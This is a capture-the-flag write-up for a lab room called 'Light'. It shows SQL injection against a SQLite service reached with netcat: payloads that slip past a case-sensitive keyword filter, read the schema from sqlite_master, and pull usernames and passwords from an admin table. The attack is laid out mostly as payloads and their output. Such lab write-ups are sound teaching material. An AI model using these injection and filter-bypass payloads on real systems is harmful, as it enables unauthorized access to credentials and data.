Payloads

About Room

I am working on a database application called Light! Would you like to try it out?
If so, the application is running on port 1337. You can connect to it using nc <ip> 1337
You can use the username smokey in order to get started.

Room Link

After using username smoke found it is vulnerable.

• After entering smoke it returned a password. so we can inject SQL payloads

┌─[TheFlyingWolf]─[~]
└──╼ $nc 10.x.x.x 1337
Welcome to the Light database!
Please enter your username: smokey
Password: vYQ5ngPpw8AdUmL

• so used some payloads somkey ' returned sql error

Please enter your username: smokey '
Error: unrecognized token: "'smokey '' LIMIT 30"

• so tried finding database version & got a different output
• The message “Ahh there is a word in there I don’t like :(“ likely indicates that the application is filtering or blacklisting certain words or phrases to prevent SQL injection attempts

Please enter your username: smoke ' select sqlite_version()
Ahh there is a word in there I don't like :(

• The database application doesn’t detect or block Select (with a capital S) but blocks select/SELECT (all lowercase or all capital), it means the filtering mechanism is case-sensitive.

Please enter your username: smoke ' Select sqlite_version()
Error: near "Select": syntax error

• The UNION operator in SQL is used to combine the results of two or more SELECT statements into a single result set. It ensures that the combined result set contains unique rows by default

Please enter your username: smoke ' Union Select sqlite_version()
Error: unrecognized token: "' LIMIT 30"
Please enter your username: smoke ' Union Select sqlite_version()'
Password: 3.31.1

• Extracted Database Structure

Please enter your username: smoke ' Union sELECT sql FROM sqlite_schema'
Error: no such table: sqlite_schema
Please enter your username: smoke ' Union sELECT sql FROM sqlite_master' 
Password: CREATE TABLE admintable (
                   id INTEGER PRIMARY KEY,
                   username TEXT,
                   password INTEGER)

• Found table name admintable

First Attempt:

smoke ' Union sELECT username from admintable where username='

• This query likely resulted in:

SELECT * FROM users WHERE username = 'smoke ' UNION SELECT username FROM admintable WHERE username = '';

• The subquery from admintable returned no results because no username matched an empty string ('').
• Output: Username not found.

Second Attempt:

smoke ' Union sELECT username from admintable where username='%'

• This query likely resulted in:

SELECT * FROM users WHERE username = 'smoke ' UNION SELECT username FROM admintable WHERE username = '%';

• The % wildcard in this context was treated as a literal string rather than a wildcard, so no match was found.
• Output: Username not found.

Third Attempt:

smoke ' Union sELECT username from admintable where username like '

• This query is incomplete and malformed because the LIKE operator requires a pattern to match (e.g., LIKE 'admin%').
• Likely resulted in a syntax error internally, but the system reported Username not found.

Fourth Attempt:

smoke ' Union sELECT username from admintable where username like '%'

• This query likely resulted in:

SELECT * FROM users WHERE username = 'smoke ' UNION SELECT username FROM admintable WHERE username LIKE '%';

• The % wildcard with LIKE matches any string, so it returned all usernames from the admintable table.
• The Username: T...........n suggests that the system displayed the first matched result, which was likely T...........n

Input:

somey' Union Select password from admintable where username='T...........n

Resulting Query: The input likely transformed the backend SQL query into something like:

SELECT * FROM users WHERE username = 'somkey' UNION SELECT password FROM admintable WHERE username = 'T.........n';

• The first part of the query (SELECT * FROM users ...) would normally fail or return nothing for username = 'somkey'.
• The UNION clause appends the result of the second query:

SELECT password FROM admintable WHERE username = 'T..........n';

• The password for T........n was retrieved and displayed m............7

Please enter your username: somkey' uNION sELECT password from admintable where password LIKE '%
Password: THM{S..........O?}

Why Did This Work?

1. Unsanitized Input:

• The application directly incorporated your input into the SQL query without escaping or parameterizing it.

2. Successful Injection via UNION:

• The UNION operator allowed you to append the result of another query (SELECT password FROM admintable) to the original result set.

3. Username Match:

• The condition WHERE username = 'T.........n' in the injected query ensured only the password for T..........n was returned.